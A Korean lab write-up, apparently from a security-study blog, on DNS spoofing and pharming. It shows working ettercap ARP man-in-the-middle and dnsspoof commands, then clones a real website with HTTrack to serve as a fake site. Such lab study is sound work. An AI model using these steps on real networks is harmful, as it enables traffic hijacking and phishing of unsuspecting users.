DNS 
www.naver.com
쿼리 = 03www05naver03com00
이러한 내용이 DNS서버로 전달됨
 
DNS spoofing
IP - NAME
 
XP : VMnet 8(NAT) 192.168.1.129
BT : VMnet 8(NAT) 192.168.1.128
    
시나리오:
XP와 게이트웨이 사이에서 BT를 거쳐 가도록 MITM상황을 만든다.
 
BT MITM 상황만들기
ettercap -T -M arp /192.168.1.129/ /192.168.1.2/
 
 
root@bt:~# mkdir dns //dns 디렉토리를 만들고 관리한다.
root@bt:~# cd dns
root@bt:~/dns# touch dnsspoof.host
root@bt:~/dns# vi dnsspoof.host

192.168.1.128 www.naver.com

root@bt:~/dns# dnsspoof -i eth0 -f dnsspoof.host
dnsspoof: listening on eth0 [udp dst port 53 and not src 192.168.1.128]

XP

네이트로 속이기

root@bt:~/dns# service apache2 start

BTWebServer를 구동시켜 놓았다면 XP에서 www.nate.com을 쳤을 때 BT의 웹페이지가 뜰 것임

확인

DNS를 이용하여 피싱 , 파밍을 할 수 있음.
 
피싱 - 전화, email, 문자, QR코드
파밍 - 불특정 다수가 나에게 들어오게 만드는 행위(오랜기간이 걸림),DNS탈취
스미싱 - 문자
비싱(?) - 전화
 
파밍 준비

BT에서 httrack-3.48.21.tar.gz 설치
 
1. ./configure
2. make
3. error 발생 -> ./src/md5.h 수정
root@bt:~/Desktop/httrack-3.48.21/src# vi md5.h
47번째줄 주석처리
4. make install
5. httrack 실행
6. error 발생 -> library
root@bt: ln -s /usr/local/lib/libhttrack.so.2 /usr/lib/libhttrack.so.2
*.so 공유라이브러리를 찾을 수 없다는 에러 메시지가 나온다.
    

system 경로 설정(동적으로 라이브러리를 불러올 경우 사용 못함)
root@bt:~# cat /etc/ld.so.conf.d/
   GL.conf libc.conf
   i486-linux-gnu.conf vmware-tools-libraries.conf
   libasound2.conf
root@bt:~# cat /etc/ld.so.conf.d/libc.conf
   # libc default configuration
   /usr/local/lib
root@bt:~# which httrack
   /usr/local/bin/httrack
root@bt:~# cd /usr/local/bin/
root@bt:/usr/local/bin# ldd httrack
    linux-gate.so.1 => (0xb7745000)
    libpthread.so.0 => /lib/tls/i686/cmov/libpthread.so.0 (0xb7718000)
    libhttrack.so.2 => /usr/lib/libhttrack.so.2 (0xb767d000)
    libz.so.1 => /lib/libz.so.1 (0xb7667000)
    libc.so.6 => /lib/tls/i686/cmov/libc.so.6 (0xb750e000)
    /lib/ld-linux.so.2 (0xb7746000)
    libcrypto.so.0.9.8 => /lib/i686/cmov/libcrypto.so.0.9.8 (0xb73bc000)
    libssl.so.0.9.8 => /lib/i686/cmov/libssl.so.0.9.8 (0xb7373000)
    libdl.so.2 => /lib/tls/i686/cmov/libdl.so.2 (0xb736f000)
root@bt:/usr/local/bin# find / -name libhttrack.so.2
   /root/Desktop/httrack-3.48.21/src/.libs/libhttrack.so.2
   /usr/lib/libhttrack.so.2
   /usr/local/lib/libhttrack.so.2
root@bt:/usr/local/bin# updatedb //라이브러리를 불러온다.
root@bt:/usr/local/bin# locate libhttrack.so.2 //라이브러리를 찾아온다.
   /root/Desktop/httrack-3.48.21/src/.libs/libhttrack.so.2
   /root/Desktop/httrack-3.48.21/src/.libs/libhttrack.so.2.0.48
   /usr/lib/libhttrack.so.2
   /usr/local/lib/libhttrack.so.2
   /usr/local/lib/libhttrack.so.2.0.48
root@bt:/usr/local/bin# ldconfig //라이브러리 리프레쉬 등록
root@bt:/usr/local/bin# ldd httrack
    linux-gate.so.1 => (0xb774a000)
    libpthread.so.0 => /lib/tls/i686/cmov/libpthread.so.0 (0xb771d000)
    libhttrack.so.2 => /usr/local/lib/libhttrack.so.2 (0xb7682000)
    libz.so.1 => /lib/libz.so.1 (0xb766c000)
    libc.so.6 => /lib/tls/i686/cmov/libc.so.6 (0xb7513000)
    /lib/ld-linux.so.2 (0xb774b000)
    libcrypto.so.0.9.8 => /lib/i686/cmov/libcrypto.so.0.9.8 (0xb73c1000)
    libssl.so.0.9.8 => /lib/i686/cmov/libssl.so.0.9.8 (0xb7378000)
    libdl.so.2 => /lib/tls/i686/cmov/libdl.so.2 (0xb7374000)
root@bt:/usr/local/bin# httrack
 
Welcome to HTTrack Website Copier (Offline Browser) 3.48-21
Copyright (C) 1998-2015 Xavier Roche and other contributors
To see the option list, enter a blank line or try httrack --help
 
Enter project name : //정상 접속 확인
 
ldd 실행파일
lib 위치 찾기
lib 등록 (updatedb)
locate 확인
ldconfig
 
httrack파일은 웹사이트를 복제하는 프로그램이다.

http://www.soen.kr/ 이 싸이트를 복제할 것이다.

root@bt:~/webcopy/soen/www.soen.kr# cp -r ./* /var/www/
생성한 복제 사이트를 web ROOT로 복사한다.


root@bt:/var/www# vi index.html

실제 Soen 홈페이지와 헷갈리지 않게 타이틀만 바꾸어 준다.



XP -> BT 웹브라우저 192.168.1.128 로 접속

성공적으로 웹페이지가 뜨는 것을 확인 할 수 있다.

파밍 실습
 
root@bt:/var/www/dns# vi dnsspoof.host

root@bt:/var/www/dns# dnsspoof -i eth0 -f dnsspoof.host

BT의 웹 사이트로 연결됨을 확인 할 수 있다.

처음 www.soen.kr을 치고 엔터를 또치면 웹페이지가 에러가 나는데 이것은 기존에 실제 soen사이트의 캐시가 남아있기 때문이다.
F5를 눌러 캐시 갱신을 해주고 인터넷 익스플로러를 키고 다시 www.soen.kr 접속하면 오류 페이지 없이 갱신된 BT의 사이트로 정상 접속이 가능하다.

'정보보안 > Network' 카테고리의 다른 글

SSL Negotiation(버전 다운그레이드)  (487) 2020.08.02
PBR(정책기반 라우팅), Tunneling  (333) 2020.08.02
DHCP Starvation 공격(DOS공격 중 하나)  (312) 2020.08.02
DHCP Spoofing  (357) 2020.08.02
ARP Spoofing,Fowarding  (409) 2020.08.02

+ Recent posts